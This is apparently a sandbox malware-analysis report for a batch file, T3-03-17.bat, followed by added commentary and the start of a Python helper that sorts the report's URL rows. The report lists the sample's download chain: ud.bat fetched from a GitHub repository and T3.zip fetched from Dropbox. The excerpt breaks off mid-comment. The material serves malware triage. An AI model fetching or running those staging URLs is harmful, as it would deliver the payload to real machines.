          Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1t 7 Feb 2023built on: Thu Feb 9 15:27:40 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: libcrypto-1_1.dll.2.dr
          Source: Binary string: D:\a\1\b\bin\amd64\python.pdb source: python.exe, 00000013.00000000.2362705216.00007FF606182000.00000002.00000001.01000000.00000007.sdmp, python.exe.2.dr
          Source: Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: vcruntime140.dll.2.dr
          Source: Binary string: and f.endswith(('.exe', '.pdb'))): source: powershell.exe, 00000002.00000002.2527605987.0000023CE62DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE62D2000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: libcrypto-1_1.dll.2.dr
          Source: Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: _overlapped.pyd.2.dr
          Source: Binary string: D:\a\1\b\libcrypto-1_1.pdb source: libcrypto-1_1.dll.2.dr
          Source: Binary string: if not srcfile.endswith(('.exe', '.pdb')): source: powershell.exe, 00000002.00000002.2527605987.0000023CE62DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE62D2000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Windows\System32\cmd.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
          Source: C:\Windows\System32\cmd.exe; File opened: C:\Users\user\AppData\
          Source: C:\Windows\System32\cmd.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\
          Source: C:\Windows\System32\cmd.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
          Source: C:\Windows\System32\cmd.exe; File opened: C:\Users\user\
          Source: C:\Windows\System32\cmd.exe; File opened: C:\Users\user\AppData\Roaming\

          Networking

          Source: Network trafficSuricata IDS: 2841189 - Severity 1 - ETPRO MALWARE Terse Request for .bat - Likely Hostile : 192.168.2.5:49721 -> 140.82.121.3:443
          Source: Network trafficSuricata IDS: 2841189 - Severity 1 - ETPRO MALWARE Terse Request for .bat - Likely Hostile : 192.168.2.5:49722 -> 185.199.108.133:443
          Source: global trafficTCP traffic: 192.168.2.5:54794 -> 1.1.1.1:53
          Source: global traffic HTTP traffic detected: GET /ty9989/u/raw/main/ud.bat HTTP/1.1 Host: github.com Connection: Keep-Alive
          Source: global traffic HTTP traffic detected: GET /ty9989/u/main/ud.bat HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
          Source: global traffic HTTP traffic detected: GET /scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1 HTTP/1.1 Host: www.dropbox.com Connection: Keep-Alive
          Source: global traffic HTTP traffic detected: GET /cd/0/get/CmClwU6KOY_G7DxBCyyyczV6fxL6vakNABlUhGPCy7enXbu24Z-ytq4R5xEb_4HUzgIwLTeTUCEJkDqxc2OXuabvCdUPhXjDCFhIkDRnPr7sP0dsKWYubmPLk0NPKUFV3ihb-4qMEd1OdvEoVV5FJ2Nr/file?dl=1 HTTP/1.1 Host: uc0b08c3d2db78a7e95098c56339.dl.dropboxusercontent.com Connection: Keep-Alive
          Source: Joe Sandbox View IP Address: 162.125.66.18
          Source: Joe Sandbox View IP Address: 34.117.59.81
          Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: unknown DNS query: name: ipinfo.io
          Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policy: script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; base-uri 'self' ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; frame-ancestors 'self' https://*.dropbox.com ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; img-src https://* data: blob: ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; media-src https://* blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; font-src https://* data: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: blob: equals www.yahoo.com (Yahoo)
          Source: global traffic DNS traffic detected: DNS query: github.com
          Source: global traffic DNS traffic detected: DNS query: raw.githubusercontent.com
          Source: global traffic DNS traffic detected: DNS query: www.dropbox.com
          Source: global traffic DNS traffic detected: DNS query: uc0b08c3d2db78a7e95098c56339.dl.dropboxusercontent.com
          Source: global traffic DNS traffic detected: DNS query: ipinfo.io
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/fsip/
          Source: python.exe, 00000013.00000003.2374510667.0000019F8E32D000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000013.00000003.2374592753.0000019F8DAF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/reference/import.html#__path__
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/document/fsip/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/presentation/fsip/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/spreadsheets/fsip/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docsend.com/
          Source: python.exe, 00000013.00000003.2439807022.0000019F9083F000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000013.00000003.2424313771.0000019F9083F000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000013.00000003.2427164804.0000019F9083F000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000013.00000003.2437802501.0000019F9083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eli.thegreenplace.net/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://experience.dropbox.com/
          Source: METADATA.2.drString found in binary or memory: https://filepreviews.io/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE62BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE62B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE62D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fishshell.com/);
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE3EB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: webdriver.py2.2.drString found in binary or memory: https://github.com/SeleniumHQ/selenium/issues/4555
          Source: readme.txt.2.drString found in binary or memory: https://github.com/mhammond/pywin32/issues
          Source: readme.txt.2.drString found in binary or memory: https://github.com/mhammond/pywin32/tree/master/adodbapi.
          Source: sessions.py.2.drString found in binary or memory: https://github.com/psf/requests/issues/1084
          Source: sessions.py.2.drString found in binary or memory: https://github.com/psf/requests/issues/3490
          Source: python.exe, 00000013.00000003.2374510667.0000019F8E32D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools/issues/417#issuecomment-392298401
          Source: METADATA.2.drString found in binary or memory: https://github.com/python-attrs/attrs
          Source: METADATA.2.drString found in binary or memory: https://github.com/python-attrs/attrs)
          Source: METADATA.2.drString found in binary or memory: https://github.com/python-attrs/attrs/blob/main/.github/CONTRIBUTING.md)
          Source: METADATA.2.drString found in binary or memory: https://github.com/python-attrs/attrs/issues/1328)
          Source: METADATA.2.drString found in binary or memory: https://github.com/python-attrs/attrs/issues/1329)
          Source: METADATA.2.drString found in binary or memory: https://github.com/python-attrs/attrs/issues/1330)
          Source: METADATA.2.drString found in binary or memory: https://github.com/python-attrs/attrs/wiki/Extensions-to-attrs)
          Source: METADATA.2.drString found in binary or memory: https://github.com/sponsors/hynek
          Source: METADATA.2.drString found in binary or memory: https://github.com/sponsors/hynek).
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE5F91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2563196888.0000023CFC0F1000.00000004.00000020.00020000.00000000.sdmp, T3-03-17.batString found in binary or memory: https://github.com/ty9989/u/raw/main/ud.bat
          Source: poolmanager.cpython-310.pyc.1784820139328.19.drString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
          Source: poolmanager.cpython-310.pyc.1784820139328.19.drString found in binary or memory: https://google.com/
          Source: poolmanager.cpython-310.pyc.1784820139328.19.drString found in binary or memory: https://google.com/mail
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://help.dropbox.com/
          Source: poolmanager.cpython-310.pyc.1784820139328.19.drString found in binary or memory: https://httpbin.org/
          Source: sessions.py.2.drString found in binary or memory: https://httpbin.org/get
          Source: METADATA.2.drString found in binary or memory: https://hynek.me/articles/import-attrs/)
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://instructorledlearning.dropboxbusiness.com/
          Source: __init__.cpython-310.pyc.1784821616560.19.drString found in binary or memory: https://json.org
          Source: METADATA.2.drString found in binary or memory: https://klaviyo.com/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.yahoo.com/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE6109000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mahler:8092/site-updates.py
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://navi.dropbox.jp/
          Source: powershell.exe, 00000002.00000002.2559482089.0000023CF3D03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://officeapps-df.live.com
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/picker
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE461B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE4611000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://opensource.org/licenses/apache2.0.php
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE461B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE4611000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://opensource.org/licenses/mit-license.php
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pal-test.adyen.com
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paper.dropbox.com/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paper.dropbox.com/cloud-docs/edit
          Source: METADATA.2.drString found in binary or memory: https://peps.python.org/pep-0649/)
          Source: METADATA.2.drString found in binary or memory: https://peps.python.org/pep-0749/)-implementing
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.dropbox.com/
          Source: METADATA.2.drString found in binary or memory: https://pypi.org/project/attrs/)
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE4429000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://python.org/sf/1333982
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE405F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
          Source: METADATA.2.drString found in binary or memory: https://raw.githubusercontent.com/python-attrs/attrs/main/docs/_static/attrs_logo.svg
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE405F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/ty9989/u/main/ud.bat
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sales.dropboxbusiness.com/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://selfguidedlearning.dropboxbusiness.com/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE44D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/pkg_resources.html#basic-resource-access
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE44D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesrp
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://showcase.dropbox.com/
          Source: METADATA.2.drString found in binary or memory: https://stackoverflow.com/questions/tagged/python-attrs)
          Source: METADATA.2.drString found in binary or memory: https://tidelift.com/?utm_source=lifter&utm_medium=referral&utm_campaign=hynek
          Source: METADATA.2.drString found in binary or memory: https://tidelift.com/?utm_source=lifter&utm_medium=referral&utm_campaign=hynek).
          Source: METADATA.2.drString found in binary or memory: https://tidelift.com/subscription/pkg/pypi-attrs?utm_source=pypi-attrs&utm_medium=pypi
          Source: sessions.py.2.drString found in binary or memory: https://tools.ietf.org/html/rfc7231#section-6.4.4
          Source: poolmanager.cpython-310.pyc.1784820139328.19.drString found in binary or memory: https://twitter.com/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uc0b08c3d2db78a7e95098c56339.dl.dropboxusercontent.com
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE40C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uc0b08c3d2db78a7e95098c56339.dl.dropboxusercontent.com/cd/0/get/CmClwU6KOY_G7DxBCyyyczV6fxL6
          Source: METADATA.2.drString found in binary or memory: https://www.attrs.org/
          Source: METADATA.2.drString found in binary or memory: https://www.attrs.org/)
          Source: METADATA.2.drString found in binary or memory: https://www.attrs.org/en/24.2.0/_static/sponsors/
          Source: METADATA.2.drString found in binary or memory: https://www.attrs.org/en/24.2.0/_static/sponsors/FilePreviews.svg
          Source: METADATA.2.drString found in binary or memory: https://www.attrs.org/en/24.2.0/_static/sponsors/Klaviyo.svg
          Source: METADATA.2.drString found in binary or memory: https://www.attrs.org/en/24.2.0/_static/sponsors/Tidelift.svg
          Source: METADATA.2.drString found in binary or memory: https://www.attrs.org/en/24.2.0/_static/sponsors/Variomedia.svg
          Source: METADATA.2.drString found in binary or memory: https://www.attrs.org/en/latest/glossary.html#term-dunder-methods)).
          Source: METADATA.2.drString found in binary or memory: https://www.attrs.org/en/latest/names.html)
          Source: METADATA.2.drString found in binary or memory: https://www.attrs.org/en/stable/changelog.html
          Source: METADATA.2.drString found in binary or memory: https://www.attrs.org/en/stable/changelog.html)
          Source: METADATA.2.drString found in binary or memory: https://www.attrs.org/en/stable/comparison.html#customization)
          Source: METADATA.2.drString found in binary or memory: https://www.attrs.org/en/stable/init.html#hooking-yourself-into-initialization)
          Source: METADATA.2.drString found in binary or memory: https://www.attrs.org/en/stable/why.html#data-classes)
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.docsend.com/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/encrypted_folder_download/service_worker.js
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/pithos/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/playlist/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE5F91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2563196888.0000023CFC0F1000.00000004.00000020.00020000.00000000.sdmp, T3-03-17.batString found in binary or memory: https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clm
          Source: powershell.exe, 00000002.00000002.2526191354.0000023CE1DA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/t3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clm
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/service_worker.js
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/static/api/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/static/serviceworker/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/v/s/playlist/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropboxstatic.com/static/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE4449000.00000004.00000800.00020000.00000000.sdmp, pkgconfig.py.2.drString found in binary or memory: https://www.freedesktop.org/wiki/Software/pkg-config/
          Source: python.exe, 00000013.00000003.2427164804.0000019F90881000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000013.00000003.2428965531.0000019F90887000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gnu.org/software/bison/manual/html_node/Default-Reductions.html#Default-Reductions
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hellofax.com/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hellosign.com/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE4C31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE4C45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE4C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ibm.com/
          Source: libcrypto-1_1.dll.2.drString found in binary or memory: https://www.openssl.org/H
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.paypal.com/sdk/js
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE6109000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE4AA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/dev/peps/pep-%04d/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE5ABF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE6362000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE6357000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE5ACA000.00000004.00000800.00020000.00000000.sdmp, python.exe, 00000013.00000003.2423533019.0000019F8E953000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/dev/peps/pep-0205/
          Source: build_ext.py.2.drString found in binary or memory: https://www.python.org/dev/peps/pep-0489/#export-hook-name
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE51A0000.00000004.00000800.00020000.00000000.sdmp, python.exe, 00000013.00000003.2396813314.0000019F8E481000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000013.00000003.2398412884.0000019F8E481000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000013.00000003.2401317346.0000019F8E481000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000013.00000003.2395495378.0000019F8E481000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000013.00000003.2399857923.0000019F8E481000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000013.00000003.2392175483.0000019F8E811000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000013.00000003.2403852689.0000019F8E440000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000013.00000003.2392517866.0000019F8E2CA000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000013.00000003.2393436260.0000019F8E808000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE487A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE48F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE48AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE488E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE4898000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE48E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE486E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/psf/license
          Source: python.exe, 00000013.00000003.2368314133.0000019F8E21C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/psf/license/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE577D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE5771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/psf/license/)
          Source: webdriver.py2.2.drString found in binary or memory: https://www.selenium.dev/documentation/legacy/desired_capabilities/
          Source: webdriver.py2.2.drString found in binary or memory: https://www.selenium.dev/documentation/legacy/json_wire_protocol/.
          Source: METADATA.2.drString found in binary or memory: https://www.variomedia.de/
          Source: poolmanager.cpython-310.pyc.1784820139328.19.drString found in binary or memory: https://yahoo.com/
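Most of the URLs in the list above are not indicators. They come from the Python runtime the sample unpacks (attrs METADATA, requests, urllib3, selenium, pywin32 sources), from PowerShell's own module strings (Pester, nuget.org, contoso.com), and from the cached Dropbox web pages PowerShell pulled while fetching the archive. The rows that matter are the ones attributed to T3-03-17.bat itself (the ud.bat on GitHub and the T3.zip on Dropbox) and the resolved download hosts they led to (raw.githubusercontent.com, *.dl.dropboxusercontent.com). The following Python is an added triage helper, not part of the Joe Sandbox report and not code from the sample: it parses rows of this shape (with or without a separator between the Source column and the finding), attributes each URL to its sources, and buckets it by how it got into memory. The sample rows are copied from the report; the staging host and path patterns are an assumption derived from the sample's own URLs, and normalization lower-cases only the host so that differently-cased paths stay distinct.

```python
import re
from urllib.parse import urlsplit

# Constructed sample: a few "String found in binary or memory" rows copied from the
# report above. Extracted copies may lack the separator before "String found", so
# both "…sdmpString found…" and "…sdmp | String found…" are accepted.
REPORT_LINES = [
    "Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/",
    "Source: METADATA.2.dr | String found in binary or memory: https://github.com/python-attrs/attrs",
    "Source: sessions.py.2.drString found in binary or memory: https://httpbin.org/get",
    "Source: powershell.exe, 00000002.00000002.2527605987.0000023CE5F91000.00000004.00000800.00020000.00000000.sdmp, T3-03-17.batString found in binary or memory: https://github.com/ty9989/u/raw/main/ud.bat",
    "Source: powershell.exe, 00000002.00000002.2527605987.0000023CE405F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/ty9989/u/main/ud.bat",
    "Source: powershell.exe, 00000002.00000002.2527605987.0000023CE5F91000.00000004.00000800.00020000.00000000.sdmp, T3-03-17.batString found in binary or memory: https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clm",
    "Source: powershell.exe, 00000002.00000002.2526191354.0000023CE1DA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/t3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clm",
]

# Source column is everything between "Source:" and the finding; the separator is optional.
ROW_RE = re.compile(
    r"^Source:\s*(?P<sources>.*?)\s*(?:\|\s*)?String found in binary or memory:\s*(?P<url>\S+)"
)

# Assumed download-stage patterns for this sample family, taken from the URLs the
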